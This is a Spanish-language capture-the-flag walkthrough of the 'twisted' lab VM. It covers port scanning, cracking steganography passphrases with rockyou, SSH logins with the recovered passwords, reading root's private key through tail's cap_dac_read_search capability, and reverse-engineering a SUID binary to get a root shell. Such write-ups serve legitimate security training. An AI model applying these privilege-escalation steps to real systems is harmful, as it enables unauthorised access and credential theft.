Identificamos la IP de la víctima:
❯ arp-scan --interface=wlo1 --localnet | grep PCS | awk '{print $1}'
192.168.1.66Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.66
[sudo] contraseña para wh01s17:
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-30 15:10 -0400
Nmap scan report for 192.168.1.66
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:B0:2F:A6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds❯ nmap -sCV -p 80,2222 -oN 02-targeted.txt 192.168.1.66
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-30 15:11 -0400
Nmap scan report for 192.168.1.66
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
| 256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_ 256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 secondsIngresamos la sitio web, y encontramos 2 imágenes, las cuales contenían mensajes ocultos con steg:
❯ stegseek -wl ~/Documentos/wordlists/rockyou.txt cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".❯ stegseek -wl ~/Documentos/wordlists/rockyou.txt cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".Utilizamos los nombres de los archivos como usuarios y su contenido como password, y nos conectamos por ssh:
markus:markuslovesbonita
mateo:thisismypassword❯ ssh mateo@192.168.1.66 -p 2222
mateo@192.168.1.66\'s password: thisismypassword
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 30 15:19:07 2025 from 192.168.1.7
mateo@twisted:~$❯ ssh markus@192.168.1.66 -p 2222
markus@192.168.1.66\'s password: markuslovesbonita
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$En el home de ambos encontramos unas notas:
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wavLa nota de markus, hace referencia a una id_rsa, pero no tenemos permisos de lectura:
markus@twisted:~$ ls -l /var/cache/apt/id_rsa
-rw------- 1 root root 1823 Oct 14 2020 /var/cache/apt/id_rsaListamos las capabilities:
markus@twisted:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+epEl comando tail, cuenta con capabilities especiales, cap_dac_read_search, la cuál permite ignorar los permisos DAC (Discretionary Access Control), por lo que podemos leer cualquier archivo sin importar los permisos establecidos.
Utilizamos tail para leer el contenido del fichero id_rsa:
markus@twisted:~$ tail /var/cache/apt/id_rsa -n 30
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----Utilizamos esta id_rsa para conectarnos como el usuario bonita y obtenemos la primera flag:
❯ ssh bonita@192.168.1.66 -p 2222 -i id_rsa_bonita
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bonita@twisted:~$Dentro del home de bonita, encontramos un binario llamado beroot con permisos SUID, que al ejecutar nos solicita un código:
bonita@twisted:~$ ./beroot
Enter the code:Transferimos el binario a nuestra máquina para su análisis:
bonita@twisted:~$ python3 -m http.server❯ wget http://192.168.1.66:8000/berootAbrimos ghidra y cargamos el binario para realizar ingeniería inversa y buscar la línea donde se verifica el código:
undefined8 main(void)
{
int local_c;
printf("Enter the code:\n ");
scanf("%i",&local_c);
if (local_c == 0x16f8) {
setuid(0);
setgid(0);
system("/bin/bash");
}
else {
puts("\nWRONG");
}
return 0;
}Vemos que se realiza la comparación con el valor en hexadecimal 0x16f8, el cuál convertimos en decimal:
❯ printf "%d" 0x16f8
5880Ejecutamos nuevamente el binario e ingresamos el código:
bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~#Obtenemos una shell del usuario root, la última flag y fin.